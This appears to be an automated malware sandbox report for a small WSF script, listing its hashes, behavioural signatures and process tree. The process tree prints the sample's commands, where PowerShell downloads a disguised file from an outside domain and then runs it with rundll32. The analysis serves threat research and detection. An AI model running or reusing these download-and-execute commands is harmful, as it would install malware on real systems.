Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
405s -
max time network
409s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
16/02/2023, 02:18
Static task
static1
Behavioral task
behavioral1
Sample
e.wsf
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
e.wsf
Resource
win10-20220901-en
General
-
Target
e.wsf
-
Size
1KB
-
MD5
6705aa10e4a17025c901675927ed47de
-
SHA1
b82ce2a7841262cc5fbab26d284de7715b358b3c
-
SHA256
ed629c9a335237d8a94f81f7dc656d6d5d4a4214ab007b824c8211f8cdb2b57d
-
SHA512
ea5991609115e47c6593aeecfa31ae76aea877b17ff64419d1e0ee681b5371d0d603aeecada9c148ea8be3c7d27f811787f717a863518eb2d5c5902949ec13f2
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1772 powershell.exe 940 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1772 powershell.exe Token: SeDebugPrivilege 940 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1472 wrote to memory of 740 1472 WScript.exe 26 PID 1472 wrote to memory of 740 1472 WScript.exe 26 PID 1472 wrote to memory of 740 1472 WScript.exe 26 PID 740 wrote to memory of 940 740 cmd.exe 28 PID 740 wrote to memory of 940 740 cmd.exe 28 PID 740 wrote to memory of 940 740 cmd.exe 28 PID 740 wrote to memory of 1772 740 cmd.exe 29 PID 740 wrote to memory of 1772 740 cmd.exe 29 PID 740 wrote to memory of 1772 740 cmd.exe 29 PID 1772 wrote to memory of 1464 1772 powershell.exe 32 PID 1772 wrote to memory of 1464 1772 powershell.exe 32 PID 1772 wrote to memory of 1464 1772 powershell.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e.wsf"1⤵
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\r.cmd" "2⤵
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoweRshell -C iwr 'http://baracundofres.com/images/150223.gif' -OutFile 'rei.dat'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoweRshell -C Start-Sleep 11;rundll32 rei.dat,Wind3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" rei.dat Wind4⤵PID:1464
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
867B
MD59919a2abbdb53145c8c3ef6daa7a1676
SHA1053ddaa2c16ad4406946a512a2d3f810a14d5aa7
SHA256d760b90bf3e666d6614b2da14b1b8de6a88e64c8506c287f579d5a10a4fa9d1d
SHA5121f1b04dacd6011414abc2db525a28368ec66ca0a7ccf168cbaf867bf3831744c983320479609bb153e2108a8df84891f5823ff3db727d395b9f6fb8bf2a06305
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD522228e1982f9ecf6b5f60e753cc73549
SHA146bee903dd937c0553e3f66838365fc900ab8224
SHA256326e21d732c50bb2d2d0c4a79e283dace1b35ad932f992cfccaf58a0107b7893
SHA5120af05fe5802bb46061f8a603c80c0de8f1908bbc0b266230227f878a79fa85dedc6ddff38d4d86043ead7fce0ea185b766538fcf077c36718ff46ac791b1022d